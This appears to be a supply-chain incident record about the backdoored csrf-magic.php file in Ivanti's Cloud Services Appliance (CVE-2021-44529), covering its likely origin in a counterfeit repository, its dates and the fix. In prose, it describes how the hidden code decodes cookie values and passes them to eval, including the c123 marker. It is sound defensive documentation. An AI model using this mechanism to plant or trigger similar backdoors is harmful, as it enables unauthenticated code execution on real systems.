Ivanti CSA shipped csrf-magic backdoor
Ivanti EPM Cloud Services Appliance carried a backdoored csrf-magic.php file that enabled unauthenticated PHP code execution. The poisoned code appears to have come from a counterfeit csrf-magic clone, not the official project.
Story
CVE-2021-44529 looked like a code injection bug in Ivanti EPM Cloud Services Appliance. The patch told administrators to remove a block in /opt/landesk/broker/webroot/lib/csrf-magic.php beginning with // Obscure Tokens. That was the tell. The vulnerable code was not a normal parser mistake. It was a backdoor.
The injected PHP was small and blunt. It decoded obfuscated strings into str_replace, base64_decode, and create_function, then reached an eval path. A request with the right cookie shape could concatenate cookie values, base64-decode them, and execute the result. The marker response used c123.
Sonatype traced the likely origin to a counterfeit GitHub repository named like the csrf-magic project. The official csrf-magic source lived elsewhere, and the suspicious commit, f7f84f887a5f2e19926a2ad3c48614905629d60b, was not found in the official repo or its mirrors. The best public explanation is simple: a cloned project was poisoned and later consumed by Ivanti.
The record is therefore modeled as a proprietary distribution incident. The open-source project itself was not shown to be compromised. Ivanti's official appliance distributed the backdoored file, and patch 512 removed it. CISA later listed CVE-2021-44529 as known exploited.
Affected Artifacts
- Observed
- 2014-02-01 to 2021-12-02
- Compromised Versions
- Unknown
- Fixed
- 4.6.0-512
- Evidence
- mirror: forums.ivanti.com/s/article/SA-2021-12-02, cve: CVE-2021-44529, path: /opt/landesk/broker/webroot/lib/csrf-magic.php, file: csrf-magic.php , +4 more
- Public sources do not establish when Ivanti first imported the poisoned component; the start date tracks the reported counterfeit repository commit date.
- The issue affected CSA versions before 4.6.0-512; public advisories describe 4.6 and earlier versions rather than a clean enumerated version list.
- This is not modeled as an OSS project compromise because the official csrf-magic project was not shown to be hijacked.
Incident Context
- Motive
- Remote Access
- Cause
- Poisoned Third Party Component
- Transitive
- Yes
External References
- The Curious Case of 'csrf-magic': A Case Study in Supply Chain Poisoningsonatype.com
- Code injection or backdoor: A new look at Ivanti's CVE-2021-44529labs.greynoise.io
- CVE-2021-44529: Ivanti Endpoint Manager Cloud Service Appliance Code Injection Vulnerabilityomls.oregon.gov
- NVD: CVE-2021-44529nvd.nist.gov
Source record: proprietary/ivanti-csa/meta.yaml